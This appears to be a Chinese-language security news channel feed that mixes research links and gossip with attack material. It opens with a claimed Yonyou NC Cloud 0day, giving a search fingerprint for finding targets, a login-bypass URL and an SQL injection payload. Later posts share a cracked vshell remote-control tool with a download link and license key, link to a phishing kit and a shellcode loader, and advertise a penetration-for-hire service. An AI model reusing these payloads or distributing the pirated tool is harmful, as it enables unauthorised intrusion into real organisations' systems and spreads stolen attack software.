用友NC Cloud 0Day漏洞
Hunter指纹: web.icon=="a5dccf6af79f420f7ea2f2becb6fafa5"
登录绕过漏洞
Payload: mp/loginxietong?username=admin
SQL注入漏洞
Payload: portal/pt/PaWfm/open?pageId=login&proDefPk=1*
#poc

网络安全上市公司2024年上半年盈亏情况

他是中国银行数据中心上海信息安全技术团队工程师，前夕，他被授予“中国银行优秀共产党员”。
ps: 保密协议白签了？
#吃瓜

CVE-2024-43044 分析 — 通过代理在 Jenkins 中读取文件进行 RCE
https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
https://github.com/convisolabs/CVE-2024-43044-jenkins
译文
https://mp.weixin.qq.com/s/ZkeCs36P-LJB60AobWQVpA
#poc #好文推荐

第十三届KCon大会PPT

打击高级持续性威胁：挑战与解决方案
https://arxiv.org/html/2309.09498v2#bib.bib12
译文
https://mp.weixin.qq.com/s/u_AzzOV96GacxAaQe7SvmQ
#广告 #渗透接单中心 @shanding007
#好文推荐

Godzilla 无文件后门攻击 Atlassian Confluence
https://www.trendmicro.com/en_us/research/24/h/godzilla-fileless-backdoors.html
译文
https://mp.weixin.qq.com/s/6EXp4X4JFquPmJyfGoq3KQ
#好文推荐

通过杀软 avast 及 no-defender 工具分析 Windows 防护机制
https://paper.seebug.org/3222/
#广告 #渗透接单中心 @shanding007
#好文推荐

telegram 创始人Du Rove获释后的首次公开发言
https://www.tgoop.com/durov/342
#吃瓜

vshell 破解版本

针对华语黑产及用户进行攻击的 APT-K-UN3 活动分析
https://paper.seebug.org/3226/
#好文推荐 #黑灰产

vshell最新4.9.3版下载地址，带 license

#工具 远控 维权 vshell 4.9.3
链接: https://pan.baidu.com/s/10nIWltOdmwiA_VWlsEKITQ 提取码: uxak
license=H1jdQSEeIERm+IC9lGcFfV++o1WFXmkjyo0U/UEFTbP62CGhMwPHBcaGimR93y2ubX8e7D0XxajDGA675qBBAQAz2G2D2+vOOapKUuVyKhfYdhRQpqRJ56st0lReOM3I1CwNF+MeExn1opoynax6HMH+vDViZJTMEKCFApWsZADenONJ1YGqfyQazXEe80c6
#安全工具 #redteam

虚假 reCAPTCHA 进行网络钓鱼
最近在 2024 年 8 月/9 月左右出现的社交工程和网络钓鱼诱饵的工具
https://github.com/JohnHammond/recaptcha-phish
#redteam #

EXE-or-DLL-or-ShellCode
作为普通 exe 执行
作为 dll 加载 + 可以调用导出函数
通过“rundll32.exe”运行
直接从 DOS (MZ) 标头作为 shellcode 执行
🔗 https://github.com/Dump-GUY/EXE-or-DLL-or-ShellCode
#redteam

php 随机数 mt_rant 的利用
https://whiteknightlabs.com/2024/06/14/exploiting-gh-13690-mt_rand-in-php-in-2024
#redteam